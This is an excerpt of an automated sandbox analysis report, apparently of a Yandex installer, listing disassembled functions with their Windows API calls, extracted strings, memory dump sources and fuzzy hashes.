                                                                                                                        • TerminateProcess.KERNEL32(10CDDB50,?,?,?,?,?,009659FC), ref: 0089C786
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0089C79C
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0089C7A8
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,009659FC), ref: 0089C7DA
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,009659FC), ref: 0089C7E6
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,009659FC), ref: 0089C7F2
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0089C811
                                                                                                                        • GetExitCodeProcess.KERNEL32(00000000,FFFFFFFF), ref: 0089C81C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$ObjectSingleWait$CodeErrorExitLastTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2432511979-0
                                                                                                                        • Opcode ID: 6201d13161c135e1101a1aea3316fb57a073be6d5a63693fa95dd8f8b0dc25d2
                                                                                                                        • Instruction ID: ee22c31e2664ce0116eb04ba242ba5bcd4ea29683d1913831023687277a0366e
                                                                                                                        • Opcode Fuzzy Hash: 6201d13161c135e1101a1aea3316fb57a073be6d5a63693fa95dd8f8b0dc25d2
                                                                                                                        • Instruction Fuzzy Hash: B621A131628345AFDF20ABB9D84DB6A7BA8FB41315F1C441CE542E7190CB71AC44EB61
                                                                                                                        Function 0596407C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0596419B
                                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 059642A9
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 059643FB
                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 05964416
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        • API String ID: 2751267872-393685449
                                                                                                                        • Opcode ID: 62dc14c9642295cfc16ee66ddccea7482022f5ae7c18d6e8dad1d549550cdca0
                                                                                                                        • Instruction ID: ea65f8a63bedebc78adeca805374c1d7c1874293571d50b0a3c50bed1eb844b9
                                                                                                                        • Opcode Fuzzy Hash: 62dc14c9642295cfc16ee66ddccea7482022f5ae7c18d6e8dad1d549550cdca0
                                                                                                                        • Instruction Fuzzy Hash: 57B19971900209EFCF18DFE4CAC4DAEBBBAFF54310B15456AE8196B211D331EA59CB91
                                                                                                                        Function 0091C968 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0091CA87
                                                                                                                        • CatchIt.LIBVCRUNTIME ref: 0091CBE6
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0091CCE7
                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0091CD02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        • API String ID: 2332921423-393685449
                                                                                                                        • Opcode ID: 8bbff115b49f08ff8b236fa401ad3b41212c4f27201f9c66bd31f58dd4c32554
                                                                                                                        • Instruction ID: f572af10150d8134a2299514b3f959732a6f6d51578a36072e2fac67541bb4df
                                                                                                                        • Opcode Fuzzy Hash: 8bbff115b49f08ff8b236fa401ad3b41212c4f27201f9c66bd31f58dd4c32554
                                                                                                                        • Instruction Fuzzy Hash: 7AB158B1A8020DEFCF15DFA4C881AEEBBB9BF44310F14455AE8156B252D731DEA1CB91
                                                                                                                        Function 0089AF80 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 261COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 0089B0E2
                                                                                                                        Strings
                                                                                                                        • UBR, xrefs: 0089B1A4
                                                                                                                        • DisplayVersion, xrefs: 0089B1B4
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0089B2B1
                                                                                                                        • ReleaseId, xrefs: 0089B1D8
                                                                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0089AFF7
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0089B2B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentProcess
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$DisplayVersion$ReleaseId$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                        • API String ID: 2050909247-1119468976
                                                                                                                        • Opcode ID: a11b630a673c0fb8795fdd1753f913436e0b17984d0c9183485f60dda0903942
                                                                                                                        • Instruction ID: 00b479a6d8311d5fda5157f682d358739a74c09f75c74939dedaa48c69372a40
                                                                                                                        • Opcode Fuzzy Hash: a11b630a673c0fb8795fdd1753f913436e0b17984d0c9183485f60dda0903942
                                                                                                                        • Instruction Fuzzy Hash: 4FA1C170A007098FDF24EFA4E5946AEBBF1FF89304F18452EE846DB641E770A985CB51
                                                                                                                        Function 008CE750 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 205COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 008CE82C
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008CE8C8
                                                                                                                        Strings
                                                                                                                        • win_clang_x, xrefs: 008CEBEF
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008CEE47
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008CEE4E
                                                                                                                        • MZx, xrefs: 008CE873
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$SystemWindows
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$MZx$win_clang_x
                                                                                                                        • API String ID: 1773879505-3272112235
                                                                                                                        • Opcode ID: 7c782ece237e3b97b690ae46e6a8c916fdd24b30788233803ff7d98f7798232f
                                                                                                                        • Instruction ID: 81b21506961a8037c8dbff4b06e25d8b09a943a2e66e16ea827b0131a4c8125b
                                                                                                                        • Opcode Fuzzy Hash: 7c782ece237e3b97b690ae46e6a8c916fdd24b30788233803ff7d98f7798232f
                                                                                                                        • Instruction Fuzzy Hash: F661A771A002289BDB11AB149C86BFE7775FF94704F004099F905E7241DB70AF89DBE2
                                                                                                                        Function 008948E0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 175COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 00894981
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_header
                                                                                                                        • String ID: Friday$Monday$Sunday$Tuesday$rday
                                                                                                                        • API String ID: 3738618077-4029317968
                                                                                                                        • Opcode ID: 9ad4380d291d162ec726cf0b75bcc5958dae9a7593ccfc888b62f39c0092e32a
                                                                                                                        • Instruction ID: 1ca1a08f521ec3fbc9a810bcaa41566540e1838ff95fcad1d9808799489a5158
                                                                                                                        • Opcode Fuzzy Hash: 9ad4380d291d162ec726cf0b75bcc5958dae9a7593ccfc888b62f39c0092e32a
                                                                                                                        • Instruction Fuzzy Hash: 189135B052CA80CEDB159B18E968F153FA0F712B48F1A919CD0958F3B2C3F59849EB56
                                                                                                                        Function 00858E60 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 137fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32 ref: 00858EA4
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00858EBA
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 00858F0B
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00858FA4
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00858FCD
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00858FBE
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00858FDC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1393: assertion __n < size() failed: vector[] index out of bounds
                                                                                                                        • API String ID: 3919263394-2095639689
                                                                                                                        • Opcode ID: 9423188520faedd0347a32bd7e8a28b85a0e902ae770730b53e8cd69a8d824d9
                                                                                                                        • Instruction ID: ef23ec0b042f08de832bab634e488b31cfe4bd4c4523bbb8a78bbfbb36ed0d65
                                                                                                                        • Opcode Fuzzy Hash: 9423188520faedd0347a32bd7e8a28b85a0e902ae770730b53e8cd69a8d824d9
                                                                                                                        • Instruction Fuzzy Hash: 0641F370A04349DFCB109F74C885AAEBBA6FF99315F24421AF805F7251EF709988C791
                                                                                                                        Function 008C4380 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 186COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0089E270: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 0089E2CD
                                                                                                                        • GetLastError.KERNEL32 ref: 008C4465
                                                                                                                        • GetLastError.KERNEL32 ref: 008C4469
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$AttributesFile
                                                                                                                        • String ID: filepath=$Failed to CryptMsgGetAndVerifySigner, gle=$Failed to CryptQueryObject, gle=$VerifyFileSigner
                                                                                                                        • API String ID: 2642427456-589752536
                                                                                                                        • Opcode ID: a95e326a31355e30c2d224fcae3c8800945223c4bb7945a3b674cb7d6aac9cbe
                                                                                                                        • Instruction ID: 0ceeecdd7120df93447417a8fc7b9c59b4ba5a6b9991773f7a3a33e489f0dc80
                                                                                                                        • Opcode Fuzzy Hash: a95e326a31355e30c2d224fcae3c8800945223c4bb7945a3b674cb7d6aac9cbe
                                                                                                                        • Instruction Fuzzy Hash: EA51AD71908350AADB10AB75DC41B6FBBE8FFC5714F04492CF995D3292DB70AA488B92
                                                                                                                        Function 0092E0D0 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 130COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(Software\Yandex,00000002,80000001), ref: 0092E153
                                                                                                                        • GetLastError.KERNEL32(?,00000001), ref: 0092E20D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: ' at '$Can't create registry value '$Can't open registry key: $RememberUidIsCreated$Software\AppDataLow\Yandex$Software\Yandex
                                                                                                                        • API String ID: 1452528299-3805467497
                                                                                                                        • Opcode ID: e6b3e1f30f6ecf7daa00116486c5273d266f00e426e57d0bb17c646a7c037086
                                                                                                                        • Instruction ID: 712e33a9159b6259db75eae73ac1d5c87674c9e6d3a6b92eb0584fa80ba1da39
                                                                                                                        • Opcode Fuzzy Hash: e6b3e1f30f6ecf7daa00116486c5273d266f00e426e57d0bb17c646a7c037086
                                                                                                                        • Instruction Fuzzy Hash: 4641C331608345AADB20ABB4EC82F5FB795EFC1704F00482CF95596182EB70A5489793
                                                                                                                        Function 009201DD Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3213747228-0
                                                                                                                        • Opcode ID: ec01695173d93463d8a107988d0f46f9cd18bb7fde2796ee8135c92eb550a283
                                                                                                                        • Instruction ID: eed0e63c83bbff099084238a0602e8fdaee391c1a0eb7ada5630569e5d5a009f
                                                                                                                        • Opcode Fuzzy Hash: ec01695173d93463d8a107988d0f46f9cd18bb7fde2796ee8135c92eb550a283
                                                                                                                        • Instruction Fuzzy Hash: 92B16932A013759FDB11DF64EC81BAE7FA9EFD5310F148156E904AF287E274A901CBA0
                                                                                                                        Function 008FC8F0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 232COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008FCBB7
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008FCB73
                                                                                                                        • string_view::substr, xrefs: 008FCB9E
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008FCBA8
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:533: assertion __s.size() == 0 || __s.data() != nullptr failed: string_view::find_first_of(): received nullptr, xrefs: 008FCB82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\string_view:533: assertion __s.size() == 0 || __s.data() != nullptr failed: string_view::find_first_of(): received nullptr$string_view::substr
                                                                                                                        • API String ID: 4218353326-3166779238
                                                                                                                        • Opcode ID: 4c49f5d5848ee1c412ab979b48a9c33676c2ce661bcd5008f636070a75054e6c
                                                                                                                        • Instruction ID: adb890071dd69589fb5bfd6ed402e3e7dc4c0da325c07964c1d8011250726c80
                                                                                                                        • Opcode Fuzzy Hash: 4c49f5d5848ee1c412ab979b48a9c33676c2ce661bcd5008f636070a75054e6c
                                                                                                                        • Instruction Fuzzy Hash: 0B819370F0021E9FCB14CF79C981ABEB7A2FF98324F148129E955E7291D770AA55CB90
                                                                                                                        Function 008E0E50 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008E1086
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008E108D
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008E1094
                                                                                                                        • installer_type, xrefs: 008E0EA8, 008E0F10, 008E0F58, 008E0F5F, 008E0F73, 008E0FC7, 008E0FCE, 008E0FE2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
